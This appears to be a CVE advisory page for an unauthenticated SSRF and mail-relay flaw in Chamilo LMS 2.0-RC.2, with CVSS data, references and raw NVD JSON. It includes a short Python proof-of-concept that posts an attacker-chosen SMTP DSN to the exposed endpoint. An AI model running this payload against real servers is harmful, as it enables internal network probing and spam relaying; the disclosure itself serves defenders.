CVE-2026-33715

Description

Chamilo LMS is an open-source learning management system. In version 2.0-RC.2, the file public/main/inc/ajax/install.ajax.php is accessible without authentication on fully installed instances because, unlike other AJAX endpoints, it does not include the global.inc.php file that performs authentication and installation-completed checks. Its test_mailer action accepts an arbitrary Symfony Mailer DSN string from POST data and uses it to connect to an attacker-specified SMTP server, enabling Server-Side Request Forgery (SSRF) into internal networks via the SMTP protocol. An unauthenticated attacker can also abuse this to weaponize the Chamilo server as an open email relay for phishing and spam campaigns, with emails appearing to originate from the server's IP address. Additionally, error responses from failed SMTP connections may disclose information about internal network topology and running services. This issue has been fixed in version 2.0.0-RC.3.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:chamilo:chamilo_lms:2.0.0:rc2:*:*:*:*:*:* - VULNERABLE

Chamilo LMS < 2.0.0-RC.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL
url = "http://target-chamilo-instance.com/main/inc/ajax/install.ajax.php"

# Attacker controlled SMTP server (for SSRF or Relay)
attacker_smtp = "smtp://192.168.1.100:25"

# Payload data
payload = {
    "action": "test_mailer",
    "mailer_dsn": attacker_smtp
}

try:
    # Send POST request to trigger the vulnerability
    response = requests.post(url, data=payload, timeout=10)
    
    # Check response
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response body:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33715
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33715
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33715/
[4] VulDB https://vuldb.com/cve/CVE-2026-33715
[5] https://github.com/chamilo/chamilo-lms/releases/tag/v2.0.0-RC.3
[6] https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-mxc9-9335-45mc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33715", "sourceIdentifier": "[email protected]", "published": "2026-04-14T21:16:26.060", "lastModified": "2026-04-23T14:56:22.223", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Chamilo LMS is an open-source learning management system. In version 2.0-RC.2, the file public/main/inc/ajax/install.ajax.php is accessible without authentication on fully installed instances because, unlike other AJAX endpoints, it does not include the global.inc.php file that performs authentication and installation-completed checks. Its test_mailer action accepts an arbitrary Symfony Mailer DSN string from POST data and uses it to connect to an attacker-specified SMTP server, enabling Server-Side Request Forgery (SSRF) into internal networks via the SMTP protocol. An unauthenticated attacker can also abuse this to weaponize the Chamilo server as an open email relay for phishing and spam campaigns, with emails appearing to originate from the server's IP address. Additionally, error responses from failed SMTP connections may disclose information about internal network topology and running services. This issue has been fixed in version 2.0.0-RC.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}, {"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chamilo:chamilo_lms:2.0.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "DAF96697-6B6D-459D-9510-E5CEEDC2859B"}]}]}], "references": [{"url": "https://github.com/chamilo/chamilo-lms/releases/tag/v2.0.0-RC.3", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-mxc9-9335-45mc", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}